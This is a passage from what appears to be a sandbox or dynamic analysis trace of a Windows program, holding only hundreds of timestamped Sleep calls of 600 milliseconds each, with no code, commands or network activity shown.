(dwMilliseconds=0x258) [0131.074] Sleep (dwMilliseconds=0x258) [0131.089] Sleep (dwMilliseconds=0x258) [0131.152] Sleep (dwMilliseconds=0x258) [0131.167] Sleep (dwMilliseconds=0x258) [0131.183] Sleep (dwMilliseconds=0x258) [0131.199] Sleep (dwMilliseconds=0x258) [0131.214] Sleep (dwMilliseconds=0x258) [0131.230] Sleep (dwMilliseconds=0x258) [0131.246] Sleep (dwMilliseconds=0x258) [0131.308] Sleep (dwMilliseconds=0x258) [0131.323] Sleep (dwMilliseconds=0x258) [0131.339] Sleep (dwMilliseconds=0x258) [0131.355] Sleep (dwMilliseconds=0x258) [0131.372] Sleep (dwMilliseconds=0x258) [0131.387] Sleep (dwMilliseconds=0x258) [0131.401] Sleep (dwMilliseconds=0x258) [0131.464] Sleep (dwMilliseconds=0x258) [0131.482] Sleep (dwMilliseconds=0x258) [0131.495] Sleep (dwMilliseconds=0x258) [0131.511] Sleep (dwMilliseconds=0x258) [0131.526] Sleep (dwMilliseconds=0x258) [0131.542] Sleep (dwMilliseconds=0x258) [0131.557] Sleep (dwMilliseconds=0x258) [0131.626] Sleep (dwMilliseconds=0x258) [0131.635] Sleep (dwMilliseconds=0x258) [0131.651] Sleep (dwMilliseconds=0x258) [0131.667] Sleep (dwMilliseconds=0x258) [0131.682] Sleep (dwMilliseconds=0x258) [0131.698] Sleep (dwMilliseconds=0x258) [0131.713] Sleep (dwMilliseconds=0x258) [0131.776] Sleep (dwMilliseconds=0x258) [0131.791] Sleep (dwMilliseconds=0x258) [0131.812] Sleep (dwMilliseconds=0x258) [0131.823] Sleep (dwMilliseconds=0x258) [0131.840] Sleep (dwMilliseconds=0x258) [0131.854] Sleep (dwMilliseconds=0x258) [0131.869] Sleep (dwMilliseconds=0x258) [0131.948] Sleep (dwMilliseconds=0x258) [0131.964] Sleep (dwMilliseconds=0x258) [0131.979] Sleep (dwMilliseconds=0x258) [0131.994] Sleep (dwMilliseconds=0x258) [0132.010] Sleep (dwMilliseconds=0x258) [0132.026] Sleep (dwMilliseconds=0x258) [0132.041] Sleep (dwMilliseconds=0x258) [0132.104] Sleep (dwMilliseconds=0x258) [0132.119] Sleep (dwMilliseconds=0x258) [0132.135] Sleep (dwMilliseconds=0x258) [0132.150] Sleep (dwMilliseconds=0x258) [0132.167] Sleep (dwMilliseconds=0x258) [0132.182] Sleep (dwMilliseconds=0x258) [0132.197] Sleep (dwMilliseconds=0x258) [0132.259] Sleep (dwMilliseconds=0x258) [0132.275] Sleep (dwMilliseconds=0x258) [0132.291] Sleep (dwMilliseconds=0x258) [0132.313] Sleep (dwMilliseconds=0x258) [0132.322] Sleep (dwMilliseconds=0x258) [0132.339] Sleep (dwMilliseconds=0x258) [0132.353] Sleep (dwMilliseconds=0x258) [0132.415] Sleep (dwMilliseconds=0x258) [0132.431] Sleep (dwMilliseconds=0x258) [0132.448] Sleep (dwMilliseconds=0x258) [0132.462] Sleep (dwMilliseconds=0x258) [0132.478] Sleep (dwMilliseconds=0x258) [0132.494] Sleep (dwMilliseconds=0x258) [0132.518] Sleep (dwMilliseconds=0x258) [0132.572] Sleep (dwMilliseconds=0x258) [0132.587] Sleep (dwMilliseconds=0x258) [0132.603] Sleep (dwMilliseconds=0x258) [0132.619] Sleep (dwMilliseconds=0x258) [0132.634] Sleep (dwMilliseconds=0x258) [0132.649] Sleep (dwMilliseconds=0x258) [0132.665] Sleep (dwMilliseconds=0x258) [0132.728] Sleep (dwMilliseconds=0x258) [0132.743] Sleep (dwMilliseconds=0x258) [0132.759] Sleep (dwMilliseconds=0x258) [0132.774] Sleep (dwMilliseconds=0x258) [0132.790] Sleep (dwMilliseconds=0x258) [0132.806] Sleep (dwMilliseconds=0x258) [0132.821] Sleep (dwMilliseconds=0x258) [0132.868] Sleep (dwMilliseconds=0x258) [0132.892] Sleep (dwMilliseconds=0x258) [0132.899] Sleep (dwMilliseconds=0x258) [0132.993] Sleep (dwMilliseconds=0x258) [0133.039] Sleep (dwMilliseconds=0x258) [0133.055] Sleep (dwMilliseconds=0x258) [0133.071] Sleep (dwMilliseconds=0x258) [0133.086] Sleep (dwMilliseconds=0x258) [0133.110] Sleep (dwMilliseconds=0x258) [0133.117] Sleep (dwMilliseconds=0x258) [0133.133] Sleep (dwMilliseconds=0x258) [0133.195] Sleep (dwMilliseconds=0x258) [0133.211] Sleep (dwMilliseconds=0x258) [0133.227] Sleep (dwMilliseconds=0x258) [0133.242] Sleep (dwMilliseconds=0x258) [0133.258] Sleep (dwMilliseconds=0x258) [0133.273] Sleep (dwMilliseconds=0x258) [0133.289] Sleep (dwMilliseconds=0x258) [0133.351] Sleep (dwMilliseconds=0x258) [0133.367] Sleep (dwMilliseconds=0x258) [0133.383] Sleep (dwMilliseconds=0x258) [0133.398] Sleep (dwMilliseconds=0x258) [0133.415] Sleep (dwMilliseconds=0x258) [0133.429] Sleep (dwMilliseconds=0x258) [0133.447] Sleep (dwMilliseconds=0x258) [0133.524] Sleep (dwMilliseconds=0x258) [0133.539] Sleep (dwMilliseconds=0x258) [0133.554] Sleep (dwMilliseconds=0x258) [0133.570] Sleep (dwMilliseconds=0x258) [0133.585] Sleep (dwMilliseconds=0x258) [0133.601] Sleep (dwMilliseconds=0x258) [0133.617] Sleep (dwMilliseconds=0x258) [0133.664] Sleep (dwMilliseconds=0x258) [0133.692] Sleep (dwMilliseconds=0x258) [0133.695] Sleep (dwMilliseconds=0x258) [0133.710] Sleep (dwMilliseconds=0x258) [0133.726] Sleep (dwMilliseconds=0x258) [0133.742] Sleep (dwMilliseconds=0x258) [0133.757] Sleep (dwMilliseconds=0x258) [0133.773] Sleep (dwMilliseconds=0x258) [0133.852] Sleep (dwMilliseconds=0x258) [0133.866] Sleep (dwMilliseconds=0x258) [0133.882] Sleep (dwMilliseconds=0x258) [0133.897] Sleep (dwMilliseconds=0x258) [0133.930] Sleep (dwMilliseconds=0x258) [0133.944] Sleep (dwMilliseconds=0x258) [0134.007] Sleep (dwMilliseconds=0x258) [0134.022] Sleep (dwMilliseconds=0x258) [0134.038] Sleep (dwMilliseconds=0x258) [0134.054] Sleep (dwMilliseconds=0x258) [0134.077] Sleep (dwMilliseconds=0x258) [0134.085] Sleep (dwMilliseconds=0x258) [0134.100] Sleep (dwMilliseconds=0x258) [0134.163] Sleep (dwMilliseconds=0x258) [0134.179] Sleep (dwMilliseconds=0x258) [0134.194] Sleep (dwMilliseconds=0x258) [0134.209] Sleep (dwMilliseconds=0x258) [0134.225] Sleep (dwMilliseconds=0x258) [0134.241] Sleep (dwMilliseconds=0x258) [0134.256] Sleep (dwMilliseconds=0x258) [0134.319] Sleep (dwMilliseconds=0x258) [0134.334] Sleep (dwMilliseconds=0x258) [0134.350] Sleep (dwMilliseconds=0x258) [0134.365] Sleep (dwMilliseconds=0x258) [0134.381] Sleep (dwMilliseconds=0x258) [0134.397] Sleep (dwMilliseconds=0x258) [0134.413] Sleep (dwMilliseconds=0x258) [0134.475] Sleep (dwMilliseconds=0x258) [0134.490] Sleep (dwMilliseconds=0x258) [0134.506] Sleep (dwMilliseconds=0x258) [0134.522] Sleep (dwMilliseconds=0x258) [0134.537] Sleep (dwMilliseconds=0x258) [0134.553] Sleep (dwMilliseconds=0x258) [0134.568] Sleep (dwMilliseconds=0x258) [0134.625] Sleep (dwMilliseconds=0x258) [0134.653] Sleep (dwMilliseconds=0x258) [0134.662] Sleep (dwMilliseconds=0x258) [0134.678] Sleep (dwMilliseconds=0x258) [0134.693] Sleep (dwMilliseconds=0x258) [0134.717] Sleep (dwMilliseconds=0x258) [0134.725] Sleep (dwMilliseconds=0x258) [0134.740] Sleep (dwMilliseconds=0x258) [0134.803] Sleep (dwMilliseconds=0x258) [0134.825] Sleep (dwMilliseconds=0x258) [0134.835] Sleep (dwMilliseconds=0x258) [0134.849] Sleep (dwMilliseconds=0x258) [0134.865] Sleep (dwMilliseconds=0x258) [0134.883] Sleep (dwMilliseconds=0x258) [0134.896] Sleep (dwMilliseconds=0x258) [0134.940] Sleep (dwMilliseconds=0x258) [0134.974] Sleep (dwMilliseconds=0x258) [0135.005] Sleep (dwMilliseconds=0x258) [0135.021] Sleep (dwMilliseconds=0x258) [0135.037] Sleep (dwMilliseconds=0x258) [0135.052] Sleep (dwMilliseconds=0x258) [0135.067] Sleep (dwMilliseconds=0x258) [0135.083] Sleep (dwMilliseconds=0x258) [0135.099] Sleep (dwMilliseconds=0x258) [0135.162] Sleep (dwMilliseconds=0x258) [0135.177] Sleep (dwMilliseconds=0x258) [0135.192] Sleep (dwMilliseconds=0x258) [0135.208] Sleep (dwMilliseconds=0x258) [0135.223] Sleep (dwMilliseconds=0x258) [0135.239] Sleep (dwMilliseconds=0x258) [0135.255] Sleep (dwMilliseconds=0x258) [0135.317] Sleep (dwMilliseconds=0x258) [0135.333] Sleep (dwMilliseconds=0x258) [0135.348] Sleep (dwMilliseconds=0x258) [0135.364] Sleep (dwMilliseconds=0x258) [0135.380] Sleep (dwMilliseconds=0x258) [0135.395] Sleep (dwMilliseconds=0x258) [0135.411] Sleep (dwMilliseconds=0x258) [0135.473] Sleep (dwMilliseconds=0x258) [0135.489] Sleep (dwMilliseconds=0x258) [0135.506] Sleep (dwMilliseconds=0x258) [0135.520] Sleep (dwMilliseconds=0x258) [0135.535] Sleep (dwMilliseconds=0x258) [0135.552] Sleep (dwMilliseconds=0x258) [0135.567] Sleep (dwMilliseconds=0x258) [0135.614] Sleep (dwMilliseconds=0x258) [0135.638] Sleep (dwMilliseconds=0x258) [0135.645] Sleep (dwMilliseconds=0x258) [0135.662] Sleep (dwMilliseconds=0x258) [0135.676] Sleep (dwMilliseconds=0x258) [0135.692] Sleep (dwMilliseconds=0x258) [0135.717] Sleep (dwMilliseconds=0x258) [0135.723] Sleep (dwMilliseconds=0x258) [0135.785] Sleep (dwMilliseconds=0x258) [0135.806] Sleep (dwMilliseconds=0x258) [0135.816] Sleep (dwMilliseconds=0x258) [0135.832] Sleep (dwMilliseconds=0x258) [0135.847] Sleep (dwMilliseconds=0x258) [0135.864] Sleep (dwMilliseconds=0x258) [0135.879] Sleep (dwMilliseconds=0x258) [0135.894] Sleep (dwMilliseconds=0x258) [0135.957] Sleep (dwMilliseconds=0x258) [0135.983] Sleep (dwMilliseconds=0x258) [0135.988] Sleep (dwMilliseconds=0x258) [0136.003] Sleep (dwMilliseconds=0x258) [0136.019] Sleep (dwMilliseconds=0x258) [0136.035] Sleep (dwMilliseconds=0x258) [0136.050] Sleep (dwMilliseconds=0x258) [0136.066] Sleep (dwMilliseconds=0x258) [0136.113] Sleep (dwMilliseconds=0x258) [0136.146] Sleep (dwMilliseconds=0x258) [0136.160] Sleep (dwMilliseconds=0x258) [0136.175] Sleep (dwMilliseconds=0x258) [0136.191] Sleep (dwMilliseconds=0x258) [0136.206] Sleep (dwMilliseconds=0x258) [0136.223] Sleep (dwMilliseconds=0x258) [0136.237] Sleep (dwMilliseconds=0x258) [0136.300] Sleep (dwMilliseconds=0x258) [0136.315] Sleep (dwMilliseconds=0x258) [0136.331] Sleep (dwMilliseconds=0x258) [0136.347] Sleep (dwMilliseconds=0x258) [0136.363] Sleep (dwMilliseconds=0x258) [0136.378] Sleep (dwMilliseconds=0x258) [0136.394] Sleep (dwMilliseconds=0x258) [0136.456] Sleep (dwMilliseconds=0x258) [0136.471] Sleep (dwMilliseconds=0x258) [0136.487] Sleep (dwMilliseconds=0x258) [0136.503] Sleep (dwMilliseconds=0x258) [0136.520] Sleep (dwMilliseconds=0x258) [0136.534] Sleep (dwMilliseconds=0x258) [0136.549] Sleep (dwMilliseconds=0x258) [0136.599] Sleep (dwMilliseconds=0x258) [0136.621] Sleep (dwMilliseconds=0x258) [0136.627] Sleep (dwMilliseconds=0x258) [0136.643] Sleep (dwMilliseconds=0x258) [0136.659] Sleep (dwMilliseconds=0x258) [0136.674] Sleep (dwMilliseconds=0x258) [0136.690] Sleep (dwMilliseconds=0x258) [0136.706] Sleep (dwMilliseconds=0x258) [0136.768] Sleep (dwMilliseconds=0x258) [0136.783] Sleep (dwMilliseconds=0x258) [0136.799] Sleep (dwMilliseconds=0x258) [0136.822] Sleep (dwMilliseconds=0x258) [0136.830] Sleep (dwMilliseconds=0x258) [0136.846] Sleep (dwMilliseconds=0x258) [0136.861] Sleep (dwMilliseconds=0x258) [0136.939] Sleep (dwMilliseconds=0x258) [0136.955] Sleep (dwMilliseconds=0x258) [0136.971] Sleep (dwMilliseconds=0x258) [0136.987] Sleep (dwMilliseconds=0x258) [0137.003] Sleep (dwMilliseconds=0x258) [0137.017] Sleep (dwMilliseconds=0x258) [0137.034] Sleep (dwMilliseconds=0x258) [0137.095] Sleep (dwMilliseconds=0x258) [0137.111] Sleep (dwMilliseconds=0x258) [0137.127] Sleep (dwMilliseconds=0x258) [0137.143] Sleep (dwMilliseconds=0x258) [0137.158] Sleep (dwMilliseconds=0x258) [0137.173] Sleep (dwMilliseconds=0x258) [0137.189] Sleep (dwMilliseconds=0x258) [0137.252] Sleep (dwMilliseconds=0x258) [0137.267] Sleep (dwMilliseconds=0x258) [0137.283] Sleep (dwMilliseconds=0x258) [0137.298] Sleep (dwMilliseconds=0x258) [0137.314] Sleep (dwMilliseconds=0x258) [0137.329] Sleep (dwMilliseconds=0x258) [0137.345] Sleep (dwMilliseconds=0x258) [0137.407] Sleep (dwMilliseconds=0x258) [0137.423] Sleep (dwMilliseconds=0x258) [0137.439] Sleep (dwMilliseconds=0x258) [0137.454] Sleep (dwMilliseconds=0x258) [0137.470] Sleep (dwMilliseconds=0x258) [0137.485] Sleep (dwMilliseconds=0x258) [0137.506] Sleep (dwMilliseconds=0x258) [0137.548] Sleep (dwMilliseconds=0x258) [0137.583] Sleep (dwMilliseconds=0x258) [0137.595] Sleep (dwMilliseconds=0x258) [0137.610] Sleep (dwMilliseconds=0x258) [0137.626] Sleep (dwMilliseconds=0x258) [0137.645] Sleep (dwMilliseconds=0x258) [0137.657] Sleep (dwMilliseconds=0x258) [0137.673] Sleep (dwMilliseconds=0x258) [0137.735] Sleep (dwMilliseconds=0x258) [0137.751] Sleep (dwMilliseconds=0x258) [0137.766] Sleep (dwMilliseconds=0x258) [0137.782] Sleep (dwMilliseconds=0x258) [0137.799] Sleep (dwMilliseconds=0x258) [0137.813] Sleep (dwMilliseconds=0x258) [0137.829] Sleep (dwMilliseconds=0x258) [0137.891] Sleep (dwMilliseconds=0x258) [0137.925] Sleep (dwMilliseconds=0x258) [0137.938] Sleep (dwMilliseconds=0x258) [0137.953] Sleep (dwMilliseconds=0x258) [0137.969] Sleep (dwMilliseconds=0x258) [0137.985] Sleep (dwMilliseconds=0x258) [0138.047] Sleep (dwMilliseconds=0x258) [0138.063] Sleep (dwMilliseconds=0x258) [0138.078] Sleep (dwMilliseconds=0x258) [0138.094] Sleep (dwMilliseconds=0x258) [0138.110] Sleep (dwMilliseconds=0x258) [0138.125] Sleep (dwMilliseconds=0x258) [0138.141] Sleep (dwMilliseconds=0x258) [0138.203] Sleep (dwMilliseconds=0x258) [0138.219] Sleep (dwMilliseconds=0x258) [0138.234] Sleep (dwMilliseconds=0x258) [0138.250] Sleep (dwMilliseconds=0x258) [0138.265] Sleep (dwMilliseconds=0x258) [0138.281] Sleep (dwMilliseconds=0x258) [0138.297] Sleep (dwMilliseconds=0x258) [0138.360] Sleep (dwMilliseconds=0x258) [0138.375] Sleep (dwMilliseconds=0x258) [0138.390] Sleep (dwMilliseconds=0x258) [0138.406] Sleep (dwMilliseconds=0x258) [0138.421] Sleep (dwMilliseconds=0x258) [0138.437] Sleep (dwMilliseconds=0x258) [0138.453] Sleep (dwMilliseconds=0x258) [0138.515] Sleep (dwMilliseconds=0x258) [0138.531] Sleep (dwMilliseconds=0x258) [0138.546] Sleep (dwMilliseconds=0x258) [0138.562] Sleep (dwMilliseconds=0x258) [0138.578] Sleep (dwMilliseconds=0x258) [0138.593] Sleep (dwMilliseconds=0x258) [0138.609] Sleep (dwMilliseconds=0x258) [0138.671] Sleep (dwMilliseconds=0x258) [0138.687] Sleep (dwMilliseconds=0x258) [0138.702] Sleep (dwMilliseconds=0x258) [0138.718] Sleep (dwMilliseconds=0x258) [0138.733] Sleep (dwMilliseconds=0x258) [0138.749] Sleep (dwMilliseconds=0x258) [0138.765] Sleep (dwMilliseconds=0x258) [0138.827] Sleep (dwMilliseconds=0x258) [0138.848] Sleep (dwMilliseconds=0x258) [0138.858] Sleep (dwMilliseconds=0x258) [0138.874] Sleep (dwMilliseconds=0x258) [0138.890] Sleep (dwMilliseconds=0x258) [0138.925] Sleep (dwMilliseconds=0x258) [0138.984] Sleep (dwMilliseconds=0x258) [0138.999] Sleep (dwMilliseconds=0x258) [0139.014] Sleep (dwMilliseconds=0x258) [0139.030] Sleep (dwMilliseconds=0x258) [0139.046] Sleep (dwMilliseconds=0x258) [0139.061] Sleep (dwMilliseconds=0x258) [0139.077] Sleep (dwMilliseconds=0x258) [0139.140] Sleep (dwMilliseconds=0x258) [0139.155] Sleep (dwMilliseconds=0x258) [0139.170] Sleep (dwMilliseconds=0x258) [0139.186] Sleep (dwMilliseconds=0x258) [0139.202] Sleep (dwMilliseconds=0x258) [0139.217] Sleep (dwMilliseconds=0x258) [0139.233] Sleep (dwMilliseconds=0x258) [0139.281] Sleep (dwMilliseconds=0x258) [0139.303] Sleep (dwMilliseconds=0x258) [0139.311] Sleep (dwMilliseconds=0x258) [0139.326] Sleep (dwMilliseconds=0x258) [0139.342] Sleep (dwMilliseconds=0x258) [0139.357] Sleep (dwMilliseconds=0x258) [0139.373] Sleep (dwMilliseconds=0x258) [0139.389] Sleep (dwMilliseconds=0x258) [0139.451] Sleep (dwMilliseconds=0x258) [0139.467] Sleep (dwMilliseconds=0x258) [0139.482] Sleep (dwMilliseconds=0x258) [0139.498] Sleep (dwMilliseconds=0x258) [0139.514] Sleep (dwMilliseconds=0x258) [0139.530] Sleep (dwMilliseconds=0x258) [0139.545] Sleep (dwMilliseconds=0x258) [0139.607] Sleep (dwMilliseconds=0x258) [0139.623] Sleep (dwMilliseconds=0x258) [0139.638] Sleep (dwMilliseconds=0x258) [0139.654] Sleep (dwMilliseconds=0x258) [0139.669] Sleep (dwMilliseconds=0x258) [0139.685] Sleep (dwMilliseconds=0x258) [0139.701] Sleep (dwMilliseconds=0x258) [0139.763] Sleep (dwMilliseconds=0x258) [0139.779] Sleep (dwMilliseconds=0x258) [0139.794] Sleep (dwMilliseconds=0x258) [0139.810] Sleep (dwMilliseconds=0x258) [0139.826] Sleep (dwMilliseconds=0x258) [0139.841] Sleep (dwMilliseconds=0x258) [0139.857] Sleep (dwMilliseconds=0x258) [0139.919] Sleep (dwMilliseconds=0x258) [0139.936] Sleep (dwMilliseconds=0x258) [0139.953] Sleep (dwMilliseconds=0x258) [0139.966] Sleep (dwMilliseconds=0x258) [0139.982] Sleep (dwMilliseconds=0x258) [0139.997] Sleep (dwMilliseconds=0x258) [0140.013] Sleep (dwMilliseconds=0x258) [0140.028] Sleep (dwMilliseconds=0x258) [0140.091] Sleep (dwMilliseconds=0x258) [0140.106] Sleep (dwMilliseconds=0x258) [0140.122] Sleep (dwMilliseconds=0x258) [0140.137] Sleep (dwMilliseconds=0x258) [0140.154] Sleep (dwMilliseconds=0x258) [0140.169] Sleep (dwMilliseconds=0x258) [0140.184] Sleep (dwMilliseconds=0x258) [0140.247] Sleep (dwMilliseconds=0x258) [0140.262] Sleep (dwMilliseconds=0x258) [0140.278] Sleep (dwMilliseconds=0x258) [0140.293] Sleep (dwMilliseconds=0x258) [0140.309] Sleep (dwMilliseconds=0x258) [0140.325] Sleep (dwMilliseconds=0x258) [0140.340] Sleep (dwMilliseconds=0x258) [0140.403] Sleep (dwMilliseconds=0x258) [0140.424] Sleep (dwMilliseconds=0x258) [0140.434] Sleep (dwMilliseconds=0x258) [0140.449] Sleep (dwMilliseconds=0x258) [0140.466] Sleep (dwMilliseconds=0x258) [0140.481] Sleep (dwMilliseconds=0x258) [0140.496] Sleep (dwMilliseconds=0x258) [0140.513] Sleep (dwMilliseconds=0x258) [0140.575] Sleep (dwMilliseconds=0x258) [0140.590] Sleep (dwMilliseconds=0x258) [0140.605] Sleep (dwMilliseconds=0x258) [0140.622] Sleep (dwMilliseconds=0x258) [0140.637] Sleep (dwMilliseconds=0x258) [0140.652] Sleep (dwMilliseconds=0x258) [0140.668] Sleep (dwMilliseconds=0x258) [0140.730] Sleep (dwMilliseconds=0x258) [0140.746] Sleep (dwMilliseconds=0x258) [0140.761] Sleep (dwMilliseconds=0x258) [0140.777] Sleep (dwMilliseconds=0x258) [0140.794] Sleep (dwMilliseconds=0x258) [0140.808] Sleep (dwMilliseconds=0x258) [0140.824] Sleep (dwMilliseconds=0x258) [0140.974] Sleep (dwMilliseconds=0x258) [0140.995] Sleep (dwMilliseconds=0x258) [0141.011] Sleep (dwMilliseconds=0x258) [0141.027] Sleep (dwMilliseconds=0x258) [0141.042] Sleep (dwMilliseconds=0x258) [0141.058] Sleep (dwMilliseconds=0x258) [0141.074] Sleep (dwMilliseconds=0x258) [0141.089] Sleep (dwMilliseconds=0x258) [0141.152] Sleep (dwMilliseconds=0x258) [0141.167] Sleep (dwMilliseconds=0x258) [0141.183] Sleep (dwMilliseconds=0x258) [0141.198] Sleep (dwMilliseconds=0x258) [0141.214] Sleep (dwMilliseconds=0x258) [0141.229] Sleep (dwMilliseconds=0x258) [0141.245] Sleep (dwMilliseconds=0x258) [0141.307] Sleep (dwMilliseconds=0x258) [0141.323] Sleep (dwMilliseconds=0x258) [0141.339] Sleep (dwMilliseconds=0x258) [0141.354] Sleep (dwMilliseconds=0x258) [0141.370] Sleep (dwMilliseconds=0x258) [0141.385] Sleep (dwMilliseconds=0x258) [0141.401] Sleep (dwMilliseconds=0x258) [0141.463] Sleep (dwMilliseconds=0x258) [0141.479] Sleep (dwMilliseconds=0x258) [0141.495] Sleep (dwMilliseconds=0x258) [0141.510] Sleep (dwMilliseconds=0x258) [0141.526] Sleep (dwMilliseconds=0x258) [0141.541] Sleep (dwMilliseconds=0x258) [0141.560] Sleep (dwMilliseconds=0x258) [0141.619] Sleep (dwMilliseconds=0x258) [0141.635] Sleep (dwMilliseconds=0x258) [0141.651] Sleep (dwMilliseconds=0x258) [0141.666] Sleep (dwMilliseconds=0x258) [0141.683] Sleep (dwMilliseconds=0x258) [0141.697] Sleep (dwMilliseconds=0x258) [0141.713] Sleep (dwMilliseconds=0x258) [0141.776] Sleep (dwMilliseconds=0x258) [0141.791] Sleep (dwMilliseconds=0x258) [0141.807] Sleep (dwMilliseconds=0x258) [0141.822] Sleep (dwMilliseconds=0x258) [0141.838] Sleep (dwMilliseconds=0x258) [0141.853] Sleep (dwMilliseconds=0x258) [0141.869] Sleep (dwMilliseconds=0x258) [0141.931] Sleep (dwMilliseconds=0x258) [0141.947] Sleep (dwMilliseconds=0x258) [0141.972] Sleep (dwMilliseconds=0x258) [0141.978] Sleep (dwMilliseconds=0x258) [0141.994] Sleep (dwMilliseconds=0x258) [0142.009] Sleep (dwMilliseconds=0x258) [0142.026] Sleep (dwMilliseconds=0x258) [0142.088] Sleep (dwMilliseconds=0x258) [0142.103] Sleep (dwMilliseconds=0x258) [0142.119] Sleep (dwMilliseconds=0x258) [0142.135] Sleep (dwMilliseconds=0x258) [0142.150] Sleep (dwMilliseconds=0x258) [0142.165] Sleep (dwMilliseconds=0x258) [0142.181] Sleep (dwMilliseconds=0x258) [0142.244] Sleep (dwMilliseconds=0x258) [0142.259] Sleep (dwMilliseconds=0x258) [0142.275] Sleep (dwMilliseconds=0x258) [0142.290] Sleep (dwMilliseconds=0x258) [0142.306] Sleep (dwMilliseconds=0x258) [0142.321] Sleep (dwMilliseconds=0x258) [0142.337] Sleep (dwMilliseconds=0x258) [0142.399] Sleep (dwMilliseconds=0x258) [0142.415] Sleep (dwMilliseconds=0x258) [0142.432] Sleep (dwMilliseconds=0x258) [0142.446] Sleep (dwMilliseconds=0x258) [0142.463] Sleep (dwMilliseconds=0x258) [0142.477] Sleep (dwMilliseconds=0x258) [0142.493] Sleep (dwMilliseconds=0x258) [0142.540] Sleep (dwMilliseconds=0x258) [0142.563] Sleep (dwMilliseconds=0x258) [0142.571] Sleep (dwMilliseconds=0x258) [0142.586] Sleep (dwMilliseconds=0x258) [0142.602] Sleep (dwMilliseconds=0x258) [0142.618] Sleep (dwMilliseconds=0x258) [0142.634] Sleep (dwMilliseconds=0x258) [0142.649] Sleep (dwMilliseconds=0x258) [0142.711] Sleep (dwMilliseconds=0x258) [0142.730] Sleep (dwMilliseconds=0x258) [0142.743] Sleep (dwMilliseconds=0x258) [0142.758] Sleep (dwMilliseconds=0x258) [0142.774] Sleep (dwMilliseconds=0x258) [0142.790] Sleep (dwMilliseconds=0x258) [0142.808] Sleep (dwMilliseconds=0x258) [0142.852] Sleep (dwMilliseconds=0x258) [0142.879] Sleep (dwMilliseconds=0x258) [0142.883] Sleep (dwMilliseconds=0x258) [0142.899] Sleep (dwMilliseconds=0x258) [0142.914] Sleep (dwMilliseconds=0x258) [0142.930] Sleep (dwMilliseconds=0x258) [0142.945] Sleep (dwMilliseconds=0x258) [0142.961] Sleep (dwMilliseconds=0x258) [0143.039] Sleep (dwMilliseconds=0x258) [0143.055] Sleep (dwMilliseconds=0x258) [0143.070] Sleep (dwMilliseconds=0x258) [0143.086] Sleep (dwMilliseconds=0x258) [0143.102] Sleep (dwMilliseconds=0x258) [0143.117] Sleep (dwMilliseconds=0x258) [0143.133] Sleep (dwMilliseconds=0x258) [0143.180] Sleep (dwMilliseconds=0x258) [0143.203] Sleep (dwMilliseconds=0x258) [0143.211] Sleep (dwMilliseconds=0x258) [0143.226] Sleep (dwMilliseconds=0x258) [0143.242] Sleep (dwMilliseconds=0x258) [0143.257] Sleep (dwMilliseconds=0x258) [0143.273] Sleep (dwMilliseconds=0x258) [0143.289] Sleep (dwMilliseconds=0x258) [0143.351] Sleep (dwMilliseconds=0x258) [0143.367] Sleep (dwMilliseconds=0x258) [0143.382] Sleep (dwMilliseconds=0x258) [0143.398] Sleep (dwMilliseconds=0x258) [0143.414] Sleep (dwMilliseconds=0x258) [0143.429] Sleep (dwMilliseconds=0x258) [0143.445] Sleep (dwMilliseconds=0x258) [0143.507] Sleep (dwMilliseconds=0x258) [0143.523] Sleep (dwMilliseconds=0x258) [0143.538] Sleep (dwMilliseconds=0x258) [0143.554] Sleep (dwMilliseconds=0x258) [0143.570] Sleep (dwMilliseconds=0x258) [0143.585] Sleep (dwMilliseconds=0x258) [0143.601] Sleep (dwMilliseconds=0x258) [0143.664] Sleep (dwMilliseconds=0x258) [0143.679] Sleep (dwMilliseconds=0x258) [0143.694] Sleep (dwMilliseconds=0x258) [0143.710] Sleep (dwMilliseconds=0x258) [0143.725] Sleep (dwMilliseconds=0x258) [0143.741] Sleep (dwMilliseconds=0x258) [0143.757] Sleep (dwMilliseconds=0x258) [0143.804] Sleep (dwMilliseconds=0x258) [0143.829] Sleep (dwMilliseconds=0x258) [0143.835] Sleep (dwMilliseconds=0x258) [0143.850] Sleep (dwMilliseconds=0x258) [0143.866] Sleep (dwMilliseconds=0x258) [0143.883] Sleep (dwMilliseconds=0x258) [0143.897] Sleep (dwMilliseconds=0x258) [0143.913] Sleep (dwMilliseconds=0x258) [0143.984] Sleep (dwMilliseconds=0x258) [0143.991] Sleep (dwMilliseconds=0x258) [0144.006] Sleep (dwMilliseconds=0x258) [0144.022] Sleep (dwMilliseconds=0x258) [0144.044] Sleep (dwMilliseconds=0x258) [0144.053] Sleep (dwMilliseconds=0x258) [0144.069] Sleep (dwMilliseconds=0x258) [0144.085] Sleep (dwMilliseconds=0x258) [0144.147] Sleep (dwMilliseconds=0x258) [0144.162] Sleep (dwMilliseconds=0x258) [0144.178] Sleep (dwMilliseconds=0x258) [0144.194] Sleep (dwMilliseconds=0x258) [0144.209] Sleep (dwMilliseconds=0x258) [0144.225] Sleep (dwMilliseconds=0x258) [0144.240] Sleep (dwMilliseconds=0x258) [0144.304] Sleep (dwMilliseconds=0x258) [0144.318] Sleep (dwMilliseconds=0x258) [0144.334] Sleep (dwMilliseconds=0x258) [0144.349] Sleep (dwMilliseconds=0x258) [0144.367] Sleep (dwMilliseconds=0x258) [0144.381] Sleep (dwMilliseconds=0x258) [0144.396] Sleep (dwMilliseconds=0x258) [0144.459] Sleep (dwMilliseconds=0x258) [0144.474] Sleep (dwMilliseconds=0x258) [0144.490] Sleep (dwMilliseconds=0x258) [0144.505] Sleep (dwMilliseconds=0x258) [0144.522] Sleep (dwMilliseconds=0x258) [0144.537] Sleep (dwMilliseconds=0x258) [0144.552] Sleep (dwMilliseconds=0x258) [0144.615] Sleep (dwMilliseconds=0x258) [0144.630] Sleep (dwMilliseconds=0x258) [0144.647] Sleep (dwMilliseconds=0x258) [0144.661] Sleep (dwMilliseconds=0x258) [0144.677] Sleep (dwMilliseconds=0x258) [0144.693] Sleep (dwMilliseconds=0x258) [0144.708] Sleep (dwMilliseconds=0x258) [0144.771] Sleep (dwMilliseconds=0x258) [0144.786] Sleep (dwMilliseconds=0x258) [0144.802] Sleep (dwMilliseconds=0x258) [0144.817] Sleep (dwMilliseconds=0x258) [0144.834] Sleep (dwMilliseconds=0x258) [0144.849] Sleep (dwMilliseconds=0x258) [0144.866] Sleep (dwMilliseconds=0x258) [0144.927] Sleep (dwMilliseconds=0x258) [0144.942] Sleep (dwMilliseconds=0x258) [0144.958] Sleep (dwMilliseconds=0x258) [0144.982] Sleep (dwMilliseconds=0x258) [0144.991] Sleep (dwMilliseconds=0x258) [0145.005] Sleep (dwMilliseconds=0x258) [0145.020] Sleep (dwMilliseconds=0x258) [0145.083] 